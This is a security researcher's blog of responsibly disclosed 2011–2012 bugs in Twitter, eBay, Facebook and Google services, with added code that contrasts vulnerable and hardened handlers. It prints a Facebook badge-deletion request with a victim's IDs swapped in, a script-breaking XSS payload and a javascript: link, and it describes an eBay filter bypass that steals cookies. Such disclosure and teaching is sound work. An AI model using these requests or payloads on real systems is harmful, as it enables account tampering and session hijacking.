
Tuesday, May 8, 2012

Twitter Vulnerability Potential XSS Worm!!! another hero?

Twitter is one of the leading social networking and information sharing systems these days.
I recently discovered (and reported) an XSS vulnerability that, had it gone unreported, could have led to something similar to "HyHack is my hero" ;).

For those of you who did not know, Twitter implemented a feature called "Lists". It lets any user add anyone to a list, with no relation to the "follow" mechanism (the victim does not have to follow the attacker, or vice versa)*, so anyone can be added to the attacker's malicious XSSed list.

The reason this is such a high-risk stored XSS vulnerability is that the attack is potentially triggered on anyone who views the attacker's profile "Lists" from a mobile device. Once a victim is infected, the attack triggers again and infects anyone who views the victim's "Lists", then anyone who views theirs, and so on... (only victims using mobile get infected! reminds you of something?)

*I did not test whether a user can add protected (locked) accounts to his lists. Any comment on this will be appreciated.

PoC picture, viewing the victim's profile:

The effect of this XSS is ONLY on victims who use Twitter on mobile!
I must say the Lists feature was not fully implemented in the mobile browser at the time I was testing, so most of my testing was performed on the "Me" tab.
Twitter did a great job resolving this vulnerability very quickly (about a day after my report), and later placed my name on the Twitter Security Whitehats page (2012).
I would like to thank Twitter for their work and for giving me the opportunity to make a responsible disclosure and help keep Twitter users safe.

Sunday, May 6, 2012

eBay Security 2011 & 2012 Wide Security Vulnerabilities

eBay has different websites for different countries. As a result of a wrong implementation of a feature common to all eBay websites, I discovered a wide vulnerability that made all of eBay's users vulnerable and at risk of being hacked!


2012 - XSS Wide Vulnerability 

The payload was injected into a script tag, bypassing the browsers' anti-XSS filters (those filters look for a whole reflected tag or script body, so a fragment landing inside an existing script block slips past them), and gave full session hijacking and the ability to
hack into eBay users' accounts.



This Time eBay did a great job fixing this vulnerability.


2011 - Vulnerability in all eBay Stores
In 2011 I discovered a vulnerability which was quite simple to exploit, since user input passed through a character blacklist which, until my report, did not sanitize input correctly.



2011 - Interesting Wrong Fix - 


Bypass: Single Parameter Splitting Injection XSS (alert isn't the goal!) 

After my report to the manager of eBay's security team, eBay came up with a fix.
This fix was a server-side update to the character blacklist: it now replaced the plus sign ("+", "%2B") and any occurrence of a double slash ("//") with nothing (""), in addition to filtering angle brackets ("<", ">"), limiting the parameter's allowed length and stripping other forbidden characters.

So, alert? prompt? Could you steal a cookie with alert? Can you do it without generating a request to your own domain?
A request to the attacker's web listener would normally require a double slash, a plus sign and a long payload, i.e. 'http://attacker.com/?s='+document.____ (there are some techniques to evade that; this bypass shows how to deal with a normal, real situation). So it may seem like a partial fix, but an anti-session-hijacking one.
After working on this filter I came up with a modified payload that bypasses it and generates a request to an attacker's website carrying the user's sensitive web elements/objects (including the cookie!). Then I made a video of a full session hijack.
The reason I am posting about this issue is the interesting vector of my bypass.
Enjoy watching:



eBay did and is still doing a great job, as they take great care of security; I thank them for that.
I am pleased I could help eBay's security team make eBay's users and customers a bit more secure.

For all of my reports (2011-2012) and security assistance to eBay, eBay gave their special appreciation ;)

Thursday, August 25, 2011

Uncrackable? - Exceptional Cracking

Okay, I've been waiting for a long time for a case worth posting on my blog. I ran into this one while searching for much less interesting, standard challenges for teaching newbies the basics of RE.
This one is a bit beyond what you are used to, and I really want you to give it a try before you read this. If you crack it quickly then don't bother reading; if you already have 3 letters of the serial and you're stuck, start reading from phrase F.

I won't teach you how to use a debugger or how to trace the relevant chunk of code; there are tons of tutorials that do just that. Consider this a case study: what's interesting is the case itself, and my focus will be accordingly.
Background:
One of the reasons I chose this crackme is that it "forces" you to focus on discovering the serial itself rather than wasting time on 'patch & trash'; additionally, the serial discovery is special.
Goal:
The goal is to find the serial key. I'll show the entire process, including the method I used and why I chose it, and I'll hand over the correct serial.
CrackMe Download Mirrors:

Friday, April 8, 2011

Facebook Vulnerability - Destroy Any advertisements/badges! (permission issue)

These days Facebook is one of the heaviest advertising engines; many companies use Facebook to promote their products and even hire people just to deal with that.


I found an attack vector that any attacker can use to delete badges/ads from people's or companies' accounts, which damages every blog or other website embedding them,
because a newly created badge gets a new "bid", so every website will drop the old badge.

This issue affects the Badges feature
As for: 
Badges Home
Profile Badges
Like Badges
Photo Badges
Page Badges

Vulnerability Details:
A user uses the Badges feature to share a badge on Blogger or anywhere else.
An attacker sees the badge on some website/blog:
<img src="http://badge.facebook.com/badge/1403380007.3098.1711802846.png" width="336" height="84" style="border: 0px;">
Analyzing the picture's name:
The first number, 1403380007, is the victim's Facebook owner ID
(it's easy to get this ID using a simple search on Facebook).
Now the middle number: 3098 is the bid (badge ID).

Now all the attacker needs is to capture a delete-badge request
and manipulate the "bid" and "owner_id" parameters:

POST /ajax/facebook-widgets/delete_badge.php?__a=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/badges/profile.php?status=new
Origin: http://www.facebook.com
X-SVN-Rev: 349667
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 ....
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mycookie
Content-Length: 137

bid=3098&owner_id=1403380007&post_form_id=073ca00487f1c8fb8903a6ff04ed57be&fb_dtsg=4xsur&lsd&post_form_id_source=AsyncRequest&confirmed=1

Then a successful badge delete is performed on the victim's account. Note that the fb_dtsg and post_form_id tokens in the request are the attacker's own, valid ones: they bind the request to a logged-in session, not the badge to its owner, so they offer no protection here.
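The following is an added example, not Facebook's code: it parses the owner ID and bid out of a badge image URL as described above, replays the captured request against a hypothetical vulnerable delete handler, and then against a hardened one that takes the owner from the session. The badge store, the attacker's user ID and the handler shapes are constructed for the example; the IDs come from the captured request.

```javascript
// Added example, not Facebook's code: why the delete_badge request is
// exploitable and what the server-side authorization check should look like.
// The badge store and handlers are hypothetical; the IDs are from the post.

// Pull owner_id and bid out of a badge image URL such as the one embedded in
// a blog, e.g. .../badge/1403380007.3098.1711802846.png
function parseBadgeUrl(url) {
  const m = /\/badge\/(\d+)\.(\d+)\.(\d+)\.png$/.exec(url);
  if (!m) return null;
  return { owner_id: m[1], bid: m[2] };
}

// Hypothetical badge store keyed by bid; constructed sample data.
function makeStore() {
  return new Map([
    ['3098', { owner_id: '1403380007', type: 'profile' }],
    ['4421', { owner_id: '555000111', type: 'page' }],
  ]);
}

// Vulnerable handler: the CSRF token (fb_dtsg) is checked, but it only proves
// the request came from *some* logged-in session. The handler then trusts
// owner_id and bid from the body, so any user can delete any badge whose IDs
// they can read off a public image URL.
function deleteBadgeVulnerable(store, session, body) {
  if (body.fb_dtsg !== session.csrfToken) return { status: 403 };
  if (!store.has(body.bid)) return { status: 404 };
  store.delete(body.bid);
  return { status: 200, deleted: body.bid };
}

// Hardened handler: the owner comes from the authenticated session, never
// from the request, and the badge must belong to that user. Answering 404
// rather than 403 avoids confirming that someone else's bid exists.
function deleteBadgeHardened(store, session, body) {
  if (body.fb_dtsg !== session.csrfToken) return { status: 403 };
  const badge = store.get(body.bid);
  if (!badge || badge.owner_id !== session.userId) return { status: 404 };
  store.delete(body.bid);
  return { status: 200, deleted: body.bid };
}

// The attacker's captured request body with the victim's IDs swapped in.
function attackerRequest(badgeUrl) {
  const { owner_id, bid } = parseBadgeUrl(badgeUrl);
  return { bid, owner_id, fb_dtsg: '4xsur', confirmed: '1' };
}

// Attacker session: a different user than the badge owner, valid CSRF token.
const ATTACKER = { userId: '999888777', csrfToken: '4xsur' }; // assumed
const VICTIM_BADGE_URL =
  'http://badge.facebook.com/badge/1403380007.3098.1711802846.png';

// Replay the request against a handler and report what happened to the badge.
function runScenario(handler) {
  const store = makeStore();
  const res = handler(store, ATTACKER, attackerRequest(VICTIM_BADGE_URL));
  return { status: res.status, victimBadgeStillExists: store.has('3098') };
}

console.log('vulnerable:', runScenario(deleteBadgeVulnerable));
console.log('hardened:  ', runScenario(deleteBadgeHardened));
```

The two handlers differ by one line: the hardened one compares the badge's stored owner with the session user instead of trusting whatever owner_id the client sent.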


The Facebook team fixed this issue and thanked me by adding my name to the Facebook WhiteHats thank-you list: Facebook Security WhiteHats

Best Regards,
Ben Hayak 

Saturday, April 2, 2011

Google Security Vulnerability Reward Program: Google Adwords Billing poisoning

Overview
Google AdWords, Google's online advertising service for boosting website traffic and sales, was vulnerable to a persistent XSS in the billing information.

What Had to be done?
The billing information details were vulnerable to a persistent XSS in 5 different fields.
The locations were:
Business name,
Contact name,
both Street Address fields, and City.
The attack was performed by editing the billing information with the right XSS payload (no special bypass required).
This XSS is so persistent that it wasn't even possible for the administrator to delete the poisoned billing information.


Screenshot:

This issue has been fixed by Google security team.

I appreciate the opportunity to practice my skills and gain some more experience.
Thank you, Google security team.

Tuesday, March 22, 2011

Google Security Vulnerability Reward Program: Take Control Over Adwords Service!

Overview
Google AdWords, Google's online advertising service for boosting website traffic and sales, was vulnerable to a persistent XSS in the main page Dashboard!

What Had to be done?

Well, here I discovered that the Dashboard page stores the Campaigns and the Ad groups as 'widgets', so I went for it and found it was vulnerable. The target of this attack could be anyone in the AdWords account, with 'read only', 'standard' or 'Administrator' access. Of course, a member who can edit/add Campaigns can take control over the administrator's account and perform actions with administrator permissions: for example, the attacker could make the administrator grant the attacker admin access with a malicious JavaScript payload, without any user interaction from the administrator. The attack triggers as soon as the admin, or any other victim, enters the AdWords service. This way I could perform session hijacking or take control over the account.

Image triggering the XSS on
vulnerable location #1 (Campaign):


Vulnerable location #2 (Ad Group):

This issue has been fixed by Google security team.

I appreciate the opportunity to practice my skills and gain some more experience.
Thank you, Google security team.

Sunday, February 27, 2011

Google Security Vulnerability Reward Program: Google Website Optimizer - Stored XSS

Overview
Google Website Optimizer, Google's free website testing and optimization tool, missed a very important check when people create their experiments; additionally, they made it even easier to exploit.

What Had to be done?

The first step was creating a new experiment (I preferred an A/B experiment). Then I had the option to add URLs to verify my website is real; at first I inserted some string, "BenHayak" for example, and pressed continue.
On the next screen I had the option to hand the dirty job over to my "Webmaster" ("Your Webmaster will install and do the dirty work for you ;)"). Great, they gave me a link to a Google domain validation page with links to BenHayak; when I clicked it I noticed it opened a page with only "BenHayak" in the address bar.
Then I made another experiment filled with many javascript:alert('BenHayak'); links and sent this stored XSS report along with a recommendation to always check for "http://" in the input.
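As an added example (not Google's code), here is the check recommended above done properly in Node.js: rather than testing for the literal prefix "http://", the input is parsed with the built-in WHATWG URL parser and only an allowlisted scheme is accepted. The list of disguised inputs is constructed for the example; the one real input from the post is the bare string "BenHayak".

```javascript
// Added example, not Google's code: validate a user-supplied site URL by
// parsing it and allowlisting the scheme. Runs in Node.js (URL is built in).

const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

// Returns true only for absolute http(s) URLs. Everything else, including
// relative paths, is rejected because the field is meant to hold a site URL.
function isSafeSiteUrl(input) {
  if (typeof input !== 'string') return false;
  let url;
  try {
    url = new URL(input); // no base URL: relative inputs throw
  } catch (e) {
    return false;
  }
  return ALLOWED_SCHEMES.has(url.protocol);
}

// Why a prefix test alone is weaker: browsers strip leading control
// characters and whitespace, drop tabs and newlines inside the URL, and treat
// the scheme case-insensitively, so each of these runs script when used as an
// href, although none starts with "http://". Constructed samples.
const TRICKY = [
  'javascript:alert(1)',
  'JaVaScRiPt:alert(1)',
  ' \t\njavascript:alert(1)',
  'java\tscript:alert(1)',
  'data:text/html,<script>alert(1)</script>',
  'vbscript:msgbox(1)',
  'BenHayak',            // the bare string from the post
  '//attacker.example',  // scheme-relative: inherits the page's scheme
];

const SAFE = ['http://benhayak.com', 'https://www.example.com/path?q=1'];

// Classify a list of inputs as [input, accepted].
function classify(list) {
  return list.map(u => [u, isSafeSiteUrl(u)]);
}

console.table(classify([...SAFE, ...TRICKY]));
```

The parser normalises the input the same way a browser would before the scheme is compared, which is what makes the allowlist reliable where a string prefix check is not.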

POC link: Click to trigger the Alert stored xss

Image triggering the xss:


I appreciate the opportunity to practice my skills and gain some more experience.
Thank you, Google security team.

Updates

Well, it's been a couple of weeks since I wanted to update the blog with
new vulnerabilities I found in Google products.
But as of now these bugs aren't fixed yet;
I will publish them soon, after Google fixes the issues.

Best regards,
Ben Hayak

Thursday, February 17, 2011

Google Security Vulnerability Reward Program: Google Bookmarks Stored XSS

Overview
Google Bookmarks lets you create online bookmark lists. I found this one in the "New Section" function. For this XSS to trigger, though, the victim had to edit your section.

What Had to be done?

The first step was creating a new bookmark list. After I got that done, I created a new section with an image tag poisoned with the XSS payload. The final step was inviting the victim by giving him/her access to my bookmark list.



This issue has been fixed by Google security team.

I appreciate the opportunity to practice my skills and gain some more experience.
Thank you, Google security team.

Wednesday, February 16, 2011

Google Security Vulnerability Reward Program: Google Finance Stored XSS

Overview
Google Finance lets you create portfolios. After a few tries I figured out a method to
trigger XSS using the portfolio name.

What Had to be done?

OK, at first I used different payloads in the portfolio name but nothing triggered.
After some more research I found that once I create my portfolio with the payload and click on Deposit / Withdraw, my portfolio name is inserted into this function:
function initPage() {
    initVars();
    dview = google.finance.portfolio.init({
        id: '8',
        expected_hash: 'U66jb3VTR2ZPUjgtaXJqaXRZc2s33VNmVWdjfDEyOTc4NzE22NDk',
        edition: 'us',
        name: '--XSS PAYLOAD--',
        currency: 'USD'
    }, true,
    '/finance/s/7skxqAM7Z8M/chart9.swf?hl=en&gl=us',
    true,
    false,
    ''
    );
}
name: '--XSS PAYLOAD--', so I inserted this payload as the portfolio name: </script><body onload=alert(1)>. There was a filter that, when you insert </script>, removed everything before the </script>. The payload works because the HTML parser ends the script element at the first </script> it meets, even inside a JavaScript string literal, so whatever follows is parsed as HTML.
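As an added example (not Google's code), the Node.js snippet below renders a page template shaped like the initPage() snippet above, shows that escaping only quotes does not stop the post's payload from ending the script element early, and shows the escaping that does: encoding every character that could form "</script" or break the string literal as a \xHH or \uHHHH escape. The template and helper names are hypothetical.

```javascript
// Added example, not Google's code: injection into a JavaScript string
// literal inside an inline <script>, and the escaping that prevents it.
// The template mirrors the shape of the initPage() snippet in the post.

// How the page embeds the portfolio name: a JS string literal in a script.
function renderPortfolioPage(name, escape) {
  return [
    '<script>',
    'dview = google.finance.portfolio.init({',
    "  name: '" + escape(name) + "',",
    '});',
    '</script>',
  ].join('\n');
}

// The HTML tokenizer knows nothing about JavaScript strings: the first
// "</script" it meets ends the script element, whatever the JS context.
// Returns the offset at which the script element actually ends.
function scriptElementEndsAt(html) {
  const open = html.indexOf('<script>');
  return html.toLowerCase().indexOf('</script', open + 1);
}

// Escaping only backslashes and quotes is the usual mistake.
function quotesOnly(s) {
  return String(s).replace(/\\/g, '\\\\').replace(/'/g, "\\'");
}

// Correct escaping for a JS string literal inside inline HTML: encode the
// backslash and quotes, plus '<', '>', '&' and '/' so the byte sequence
// "</script" can never appear in the output, plus the line terminators
// (U+2028/U+2029 included) that would otherwise break the literal.
function jsStringEscape(s) {
  return String(s).replace(/[\\'"<>&\/\r\n\u2028\u2029]/g, ch => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

const PAYLOAD = '</script><body onload=alert(1)>'; // the post's payload

// Does the rendered page end the script element before the real </script>?
function scriptTerminatedEarly(name, escape) {
  const html = renderPortfolioPage(name, escape);
  const realEnd = html.lastIndexOf('</script>');
  return scriptElementEndsAt(html) < realEnd;
}

// Round trip: parsing the escaped literal as JavaScript must give back the
// original name unchanged, so the fix does not alter legitimate data.
function roundTrips(name) {
  return new Function("return '" + jsStringEscape(name) + "';")() === name;
}

console.log('quotes-only escape breaks out:', scriptTerminatedEarly(PAYLOAD, quotesOnly));
console.log('jsStringEscape breaks out:    ', scriptTerminatedEarly(PAYLOAD, jsStringEscape));
console.log('round trip ok:', roundTrips(PAYLOAD));
```

The same escaping neutralises the script-tag injection described in the eBay 2012 post above: once "<" and "/" can only appear as \x3c and \x2f inside the literal, nothing the value contains can be seen as markup by the HTML parser.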


I appreciate the opportunity to practice my skills and gain some more experience.
Thank you, Google security team.